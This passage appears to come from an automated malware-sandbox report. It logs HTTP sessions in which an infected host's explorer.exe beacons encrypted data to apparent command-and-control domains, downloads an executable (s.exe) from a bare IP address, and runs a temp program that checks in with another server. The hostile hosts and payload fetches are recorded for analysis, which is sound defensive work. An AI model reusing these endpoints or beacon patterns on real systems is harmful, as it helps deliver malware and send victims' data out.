b4 bb 01 7a 17 28 92 ae 46 5f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4
                                                                                                                                  Data Ascii: 3830`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*Y>(i;a#0T-il2`ma*^kZH|fS4wp673b#p"XJcb>Y Zj[V?#B7PRS+{~E~,U$a|l~_DzW(8%Q.|8HkJ{/a]F4n2l||~qhJO;yLuV)*n#u1yr+Lc<'i3FHU!hU@Wd{9f(B@wXdQ`K^NTUOIL/TUL7i),^[}_>tyuC|y+z(F_zk7 RH:M?~Mpvn%.5_)CCUb:@
                                                                                                                                  Oct 17, 2022 22:06:38.070897102 CEST1773OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://xeebbali.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 302
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:38.175702095 CEST1774INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:38 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OJJMFUDHfK88ejDb3ssSgFlIiEfC3o%2FsibgdQSJX%2Bj5YP9NLc75w8mjBAVXgyOiGaz5xhN1OBkqQMjxU1YMvnY%2BlcycxsRry5NM3%2BM1b%2B3nAdax6pmmNprEk1hp7Mmd%2F5g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7e7fb9506d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                                                  Oct 17, 2022 22:06:38.261997938 CEST1775OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://ygjlvm.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 367
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:38.378248930 CEST1777INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:38 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aZKHvJvCVDCzxhjWf5J7Z9xbZ3ssVz0tZAOE%2BAhaTk6DEEA82yxzyjC%2BpHWjq0J0nQOyRFRkwLq6FGHh2WrIAX2GwKoR5X8WIXpKW6u5q3U8EWmHbSz46SbVBrXwl6b1Xw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7e92d8406d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 34 64 63 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 e2 82 15 fc d0 33 a4 53 f6 c7 35 f3 73 07 03 d2 ef f9 fb fa eb b1 87 6a cd 15 3d 33 d1 8c 77 45 7c 1f 57 44 d5 2d 97 3c 50 25 51 fe 08 22 b9 3f 19 66 3d 28 2a 97 6a dd d6 bc db 43 17 5c 53 a6 cd f6 4d 55 62 91 54 5b fd 55 19 d0 ed e5 10 b1 17 26 58 4a 33 4f 62 3e 17 21 2b da a3 06 83 3a 56 3f cb 00 23 ae 42 15 d7 07 53 53 fa cb 0f 9e 1d 09 52 2b e5 9d 83 7b 7e 45 f7 ff 78 8d 55 db d4 0d 13 13 bf 1e e1 92 24 08 4f c5 03 af 87 a1 c1 7e de f5 69 b9 19 17 7e 5f af 9a 15 16 a9 a0 91 31 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d 75 74 bf 76 34 fd f8 92 3d 53 6c 19 7d 0a 8d c7 fd e4 0e a4 eb 7e 71 eb a0 b2 1a b8 9b 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 9c 01 6b 49 0d 92 90 f7 33 d4 e2 e7 72 3b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 f9 48 15 cc 81 99 bd 34 49 ce ba 68 58 94 fc 9d 7f 3f 5b 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 b1 8a 64 f1 33 54 73 25 ed 70 17 4b 65 f2 df 8e 82 e1 f9 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 5e 54 ab de 08 0d 75 8f b7 af 57 a3 04 99 85 1f d4 dc 7a 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 ca 92 b6 3b 35 2d 11 6d 43 58 b9 8b 8b e1 72 69 d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 a6 b4 47 30 80 e3 1c 78 66 e3 52 48 e4 29 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca e2 cf 25 4e b1 e0 a3 9c 04 98 c3 a7 0d c3 fd d4 5f 59 6a 43 9c 39 34 62 18 3e 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 a3
                                                                                                                                  Data Ascii: 4dc`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*j3S5sj=3wE|WD-<P%Q"?f=(*jC\SMUbT[U&XJ3Ob>!+:V?#BSSR+{~ExU$O~i~_1zN,%Qa>|(HkJ{/autv4=Sl}~qJO;yLuVW;*r#kI3r;Lc1<'i3FH4IhX?[@Wd{9f(B@w=fd3Ts%pKe^NTUo)2([^TuWz),^[};5-mCXri+z(FzkG0xfRH)M?~Mpvn%N_YjC94b>@3%}
                                                                                                                                  Oct 17, 2022 22:06:42.842374086 CEST5577OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://pdviimuy.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 349
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:42.952801943 CEST5579INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:42 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vkHqKg5vyXTimHZFe9tYdqMPuqfUY%2Fpg1rG8PBkOrVnw1Y9bIBgDBAnzaPSgrCYUG86718Mr4lfZNwg7zuRNN9zxFXE3QXVUSwcrxLhwLa6eNaKlXUkXtWzrwHPHWFgLog%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba805de2806d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  16192.168.2.549693185.174.137.17480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Oct 17, 2022 22:06:30.526719093 CEST1072OUTGET /s.exe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: 185.174.137.174
                                                                                                                                  Oct 17, 2022 22:06:30.566370964 CEST1073INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:30 GMT
                                                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                  Last-Modified: Mon, 17 Oct 2022 19:59:09 GMT
                                                                                                                                  ETag: "36200-5eb4068a369dc"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Content-Length: 221696
                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 db a3 54 76 9f c2 3a 25 9f c2 3a 25 9f c2 3a 25 81 90 af 25 88 c2 3a 25 81 90 b9 25 e0 c2 3a 25 b8 04 41 25 9c c2 3a 25 9f c2 3b 25 0e c2 3a 25 81 90 be 25 a9 c2 3a 25 81 90 ae 25 9e c2 3a 25 81 90 ab 25 9e c2 3a 25 52 69 63 68 9f c2 3a 25 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3a 51 4b 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f0 01 00 00 58 17 00 00 00 00 00 06 a1 00 00 00 10 00 00 00 00 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 30 19 00 00 04 00 00 3c 0b 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c f3 01 00 28 00 00 00 00 e0 18 00 d8 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 39 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 1c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 ef 01 00 00 10 00 00 00 f0 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 40 dc 16 00 00 00 02 00 00 22 01 00 00 f4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d8 4b 00 00 00 e0 18 00 00 4c 00 00 00 16 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Tv:%:%:%%:%%:%A%:%;%:%%:%%:%%:%Rich:%PEL:QKaX@0<|(K09@.text `.data@"@.rsrcKL@@


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  17192.168.2.54970245.136.151.10280C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Oct 17, 2022 22:07:05.927108049 CEST5771OUTGET /check/safe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  Host: aaa.apiaaaeg.com
                                                                                                                                  Oct 17, 2022 22:07:06.081849098 CEST5771INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:06 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/7.3.23
                                                                                                                                  Data Raw: 35 63 0d 0a 54 55 52 4e 4d 30 31 71 53 54 46 4d 51 30 70 35 57 56 63 31 61 31 67 7a 54 6a 42 6a 61 55 6b 32 53 57 74 46 4d 6c 46 73 5a 46 52 54 5a 58 6c 4b 65 6d 46 58 55 57 6c 50 61 6c 6c 36 54 6d 70 56 4d 30 78 44 53 6a 42 68 56 7a 46 73 53 57 70 76 65 45 35 71 57 54 4a 70 53 6a 6b 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 5cTURNM01qSTFMQ0p5WVc1a1gzTjBjaUk2SWtFMlFsZFRTZXlKemFXUWlPall6TmpVM0xDSjBhVzFsSWpveE5qWTJpSjk=0
                                                                                                                                  Oct 17, 2022 22:07:06.666146994 CEST5772OUTPOST /check/?sid=63657&key=0e7c4366e2f6f45645238b06b04781ad HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  Content-Length: 392
                                                                                                                                  Host: aaa.apiaaaeg.com
                                                                                                                                  Oct 17, 2022 22:07:06.850296974 CEST5773INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:06 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/7.3.23
                                                                                                                                  Data Raw: 33 31 0d 0a 7b 22 73 74 61 74 75 73 22 3a 32 2c 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 31 35 22 2c 22 61 63 63 6f 75 6e 74 73 22 3a 22 30 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 31{"status":2,"ip":"102.129.143.15","accounts":"0"}0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  18192.168.2.54970534.91.216.4980C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Oct 17, 2022 22:07:11.143611908 CEST5901OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://xqxsaedljj.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 294
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:11.258194923 CEST5903INHTTP/1.1 404 Not Found
                                                                                                                                  date: Mon, 17 Oct 2022 20:07:11 GMT
                                                                                                                                  server: Apache/2.4.41 (Ubuntu)
                                                                                                                                  transfer-encoding: chunked
                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                  Data Raw: 32 42 34 33 0d 0a 53 00 00 00 8f 3b 45 34 46 2c cf 60 b9 6a 5a 56 fd aa f0 00 44 2e f9 96 b4 f0 a5 47 03 af d5 2e f1 b0 70 50 db a4 94 f0 31 a2 da 8c a0 37 bd 47 9a a0 1b 43 cd 66 5d 8b 58 3b b5 cc d7 06 9a e2 13 8c 8d 91 f8 2b a4 1e 31 f3 d8 ca f9 e4 dd 3b f9 1c 88 21 b0 c2 f0 00 ca 74 02 00 1c ac 2b da 00 0b 07 00 09 00 34 00 00 01 54 b5 a6 04 fa 19 13 50 fe ad bf fe 50 01 0b 00 6b 6d 9b a1 be 47 6b 95 bb 2f 20 d4 c8 8f 3e f9 48 d9 5d 6d 65 6d 75 16 dc 93 04 9a 4e 3d 6e 00 a7 fb c4 e6 ba 10 81 4e de c9 81 63 bd 6b c1 21 12 08 03 82 92 b9 66 33 2c c4 d8 a4 26 81 d2 23 e6 f5 f0 39 01 b1 f6 c3 ff ed 03 02 bb a2 cb aa 25 f7 50 36 a5 43 cb 97 a8 89 2f 73 18 41 7c 38 c8 25 6c e3 2a 3c 5c 31 22 93 fa eb 08 47 0a cb 81 c7 f6 64 05 28 c2 6a 21 d2 ce 9f ad 76 7d 4a 1a d8 92 2f 8c 78 c6 24 f2 d6 cf 6b fb c5 e7 05 b0 1f 95 8d a2 26 fc ad 77 7d 1f 5b 65 2f 3f 20 47 56 ae f1 94 d8 e8 af 02 9c 35 87 be c3 a6 6b 91 75 5d 48 ac 3a 7e a2 d9 1c ad 62 4f e2 8d fa e3 a9 4d d6 02 65 2c a5 97 c6 61 03 59 fc 1d d4 88 16 72 64 45 ef 71 50 7d 98 6f 6e 3b 4c 4a 24 46 46 d2 e5 01 0f 29 c5 77 b5 91 d2 cf 70 47 4e 70 90 b9 1a e8 a3 c8 f4 35 b3 7d 94 47 eb 9e 1c 83 1b 9f 2b 04 01 20 1b 5d 82 c5 96 4e c0 54 3b 64 88 1b 82 ad a0 f7 12 e2 23 b3 67 bd 67 b8 6c d5 2e df 89 bb 99 b8 f8 a8 37 72 14 26 37 4c 36 33 93 ea 14 9f fc 79 88 6c 52 f9 4b a8 4b 79 72 fe 17 4a 97 56 fc 2c 49 19 fe ac 9b 63 57 59 57 b2 6d 42 86 48 71 26 85 c8 e9 46 b3 be 7d 6e 49 77 a0 bc d7 28 3b 4d 72 ba 0f 96 20 d8 e2 f0 06 2a 13 f4 31 f3 75 9d 49 ed a3 a9 16 2a be 8b 64 65 69 55 b5 88 be 3d 47 b3 fd d6 b1 69 98 52 de 77 cb ee 26 12 15 57 48 43 74 87 cc a7 87 b5 da 57 bd 62 db 5b 02 16 5b 43 da 83 e9 7d eb 69 ba cb 94 e0 d3 9c 36 d6 e8 5e 61 b8 d3 7c 0b 4f 5f d4 5f 20 84 6f 29 33 35 f8 06 1c 4b 74 4f 8b c3 37 09 e9 f0 3f 99 f4 29 aa d7 6c e4 9b 7d 8d 35 38 05 d8 ed 28 87 b4 7c 23 20 1a 4c 17 4f d3 f2 78 47 99 4d 46 4c ff 34 b5 cf ce 58 f4 58 6b ff 58 95 63 70 fe 45 7b 44 6a 9d 01 70 a4 96 d5 37 e9 53 35 1c ec 0d 77 3d 02 33 8a 5d 4f 02 f9 f2 29 23 5a ba c1 49 cd e4 b9 8f de 25 c8 51 82 ca ba 10 3a 0d e9 c9 3c 79 23 63 02 10 48 3f 91 d7 9d ee 95 29 de 70 a0 eb 9f 55 33 e8 17 3e 67 82 d3 5f 4a b1 d1 1c b2 35 6f e1 d4 36 68 1c b3 19 84 3c 49 ae 3a bf 98 c3 68 29 98 be f9 8d 66 0e 59 d3 88 1d a4 ea 06 bc 7f ab de 5a 8a 42 d8 ab 4a ed 7b 02 99 5f 31 df c6 ae 1b 3c a7 00 1c 42 02 01 1b 9b b8 5a 93 aa ba 49 d3 17 c5 0a f3 97 e0 63 f3 d1 e5 b9 41 bb 2a 06 24 ad af b9 25 17 3b f1 9b 84 1e ce 34 9c 3a 66 91 81 a2 ef 69 19 74 61 e8 33 37 39 af ed b1 65 c2 c3 f9 b0 fa f4 1c 64 c9 43 62 b0 fb e1 82 2e 1e ff a9 5b 8f 2c 06 1c 99 47 12 ba b9 cb de a6 fb 99 d6 48 4c ef 17 cd 38 c0 b1 f7 5c 4d 17 a5 55 86 f6 0f 6e 91 4f 16 df 22 08 2a 6e 37 d0 e4 00 c5 68 60 4a 30 1a 94 6b 3c 70 15 50 86 ac e2 b2 6c 59 c9 04 da 97 f7 61 7d 85 31 2d cb 9f 14 c0 72 fd 91 84 ff e6 9b 97 bb 1d 2c 7e fc 66 96 1e 85 41 67 5c 41 d7 d5 63 7c 55 a6 73 68 f1 7b 06 63 c1 43 53 6d 2b a9 b8 33 17 10 93 0d fe 52 14 cc f6 03 5c e0 17 a5 ac 37 e9 a8 44 fd 01 bc 68 42 c4 5e d8 07 96 b1 8d 7e c5 23 ef d2 c8 90 b5 3f 98 00 4e fc b3 2b e5 63 ae 4b 20 88 a4 58 65 ea ee a5 8e ae 58 00 2f a2 f5 7d a4 00 27 83 21 dd 64 5f c1 fd 28 0d e4 0a ba 64 a5 46 2b 8e 08 5d 0b c1 01 73 70 2a 14 62 03 02 76 c4 e9 ba 55 07 90 08 37 a5 ef 08 a8 1c 1e e3 16 8a de d8 01 1a 83 4a 26 dd 0d 32 28 90 ae 25 2c ee 52 ae 71 73 0d 95 e7 11 2d 4e a5
                                                                                                                                  Data Ascii: 2B43S;E4F,`jZVD.G.pP17GCf]X;+1;!t+4TPPkmGk/ >H]memuN=nNck!f3,&#9%P6C/sA|8%l*<\1"Gd(j!v}J/x$k&w}[e/? GV5ku]H:~bOMe,aYrdEqP}on;LJ$FF)wpGNp5}G+ ]NT;d#ggl.7r&7L63ylRKKyrJV,IcWYWmBHq&F}nIw(;Mr *1uI*deiU=GiRw&WHCtWb[[C}i6^a|O__ o)35KtO7?)l}58(|# LOxGMFL4XXkXcpE{Djp7S5w=3]O)#ZI%Q:<y#cH?)pU3>g_J5o6h<I:h)fYZBJ{_1<BZIcA*$%;4:fita379edCb.[,GHL8\MUnO"*n7h`J0k<pPlYa}1-r,~fAg\Ac|Ush{cCSm+3R\7DhB^~#?N+cK XeX/}'!d_(dF+]sp*bvU7J&2(%,Rqs-N
                                                                                                                                  Oct 17, 2022 22:07:11.564759016 CEST6070OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://rpnkx.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 268
                                                                                                                                  Host: avtlsgosecure.com
                                                                                                                                  Oct 17, 2022 22:07:11.681624889 CEST6070INHTTP/1.1 200 OK
